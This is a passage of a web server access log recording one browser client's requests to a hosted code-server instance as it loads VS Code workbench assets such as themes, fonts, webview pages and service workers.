(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/codicon.ttf?5d4d76ab2ce5108968ad644d591a16a6" [Client 84.1.26.27] [Length 59438] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 46748] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:24 +0000] - - 499 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=553d76ba-7c0f-4b3e-a0e6-51f994bf651d&parentId=1&origin=553d76ba-7c0f-4b3e-a0e6-51f994bf651d&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/editor/common/services/editorWebWorkerMain.js" [Client 84.1.26.27] [Length 103577] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11498] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/api/worker/extensionHostWorkerMain.js" [Client 84.1.26.27] [Length 435714] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fvs-seti-icon-theme.json&tkn=" [Client 84.1.26.27] [Length 7574] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_modern.json&tkn=" [Client 84.1.26.27] [Length 1393] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=47d93e42-396f-40a7-b234-6e657fb3a783" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fseti.woff&tkn=" [Client 84.1.26.27] [Length 37336] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/light.png" [Client 84.1.26.27] [Length 10174] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/dark.png" [Client 84.1.26.27] [Length 10586] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_plus.json&tkn=" [Client 84.1.26.27] [Length 1034] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/dark-hc.png" [Client 84.1.26.27] [Length 10635] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/light-hc.png" [Client 84.1.26.27] [Length 10635] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=47d93e42-396f-40a7-b234-6e657fb3a783&parentId=1&origin=47d93e42-396f-40a7-b234-6e657fb3a783&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:25 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_vs.json&tkn=" [Client 84.1.26.27] [Length 1849] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:26 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[20/Jan/2026:06:44:27 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=a1e4be09-640b-4b81-9e94-9dc29b3c52c7&parentId=1&origin=a1e4be09-640b-4b81-9e94-9dc29b3c52c7&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11498] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/extensions.svg?{%22moduleId%22:%22vs/workbench/contrib/welcomeGettingStarted/common/media/extensions.svg%22}" [Client 84.1.26.27] [Length 304418] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:36 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=a1e4be09-640b-4b81-9e94-9dc29b3c52c7" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=a1e4be09-640b-4b81-9e94-9dc29b3c52c7&parentId=1&origin=a1e4be09-640b-4b81-9e94-9dc29b3c52c7&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:37 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=45b0300c-1c64-4d14-a512-10222f1f6c1e&parentId=1&origin=45b0300c-1c64-4d14-a512-10222f1f6c1e&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11491] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:38 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=45b0300c-1c64-4d14-a512-10222f1f6c1e" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=45b0300c-1c64-4d14-a512-10222f1f6c1e&parentId=1&origin=45b0300c-1c64-4d14-a512-10222f1f6c1e&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=911fe128-f9c2-4278-8e52-fd9325c4f217&parentId=1&origin=911fe128-f9c2-4278-8e52-fd9325c4f217&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11498] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=911fe128-f9c2-4278-8e52-fd9325c4f217" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=911fe128-f9c2-4278-8e52-fd9325c4f217&parentId=1&origin=911fe128-f9c2-4278-8e52-fd9325c4f217&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=db312fd6-b700-4d81-987a-dd4e72153403&parentId=1&origin=db312fd6-b700-4d81-987a-dd4e72153403&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11491] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:42 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=db312fd6-b700-4d81-987a-dd4e72153403" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=db312fd6-b700-4d81-987a-dd4e72153403&parentId=1&origin=db312fd6-b700-4d81-987a-dd4e72153403&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:44 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=a4c64e22-277e-464b-a279-b8ab07ee7213&parentId=1&origin=a4c64e22-277e-464b-a279-b8ab07ee7213&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11491] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=a4c64e22-277e-464b-a279-b8ab07ee7213" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=a4c64e22-277e-464b-a279-b8ab07ee7213&parentId=1&origin=a4c64e22-277e-464b-a279-b8ab07ee7213&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:49 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:49 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/menuBar.svg?{%22moduleId%22:%22vs/workbench/contrib/welcomeGettingStarted/common/media/menuBar.svg%22}" [Client 84.1.26.27] [Length 1671] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:49 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=7b63172d-99e9-4f52-9c24-34f07c6465ad&parentId=1&origin=7b63172d-99e9-4f52-9c24-34f07c6465ad&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11491] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:50 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=7b63172d-99e9-4f52-9c24-34f07c6465ad" [Client 84.1.26.27] [Length 117] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=7b63172d-99e9-4f52-9c24-34f07c6465ad&parentId=1&origin=7b63172d-99e9-4f52-9c24-34f07c6465ad&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:51 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 2406] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/service-worker.js?v=4&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&remoteAuthority=code.profibot.hu" +[20/Jan/2026:06:44:52 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/index.html?id=e0beea97-6add-4449-952c-e6e85d9e0902&parentId=1&origin=e0beea97-6add-4449-952c-e6e85d9e0902&swVersion=4&extensionId=&platform=browser&vscode-resource-base-authority=vscode-resource.vscode-cdn.net&parentOrigin=https%3A%2F%2Fcode.profibot.hu&disableServiceWorker=true&remoteAuthority=code.profibot.hu" [Client 84.1.26.27] [Length 11491] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:53 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/webview/browser/pre/fake.html?id=e0beea97-6add-4449-952c-e6e85d9e0902" [Client 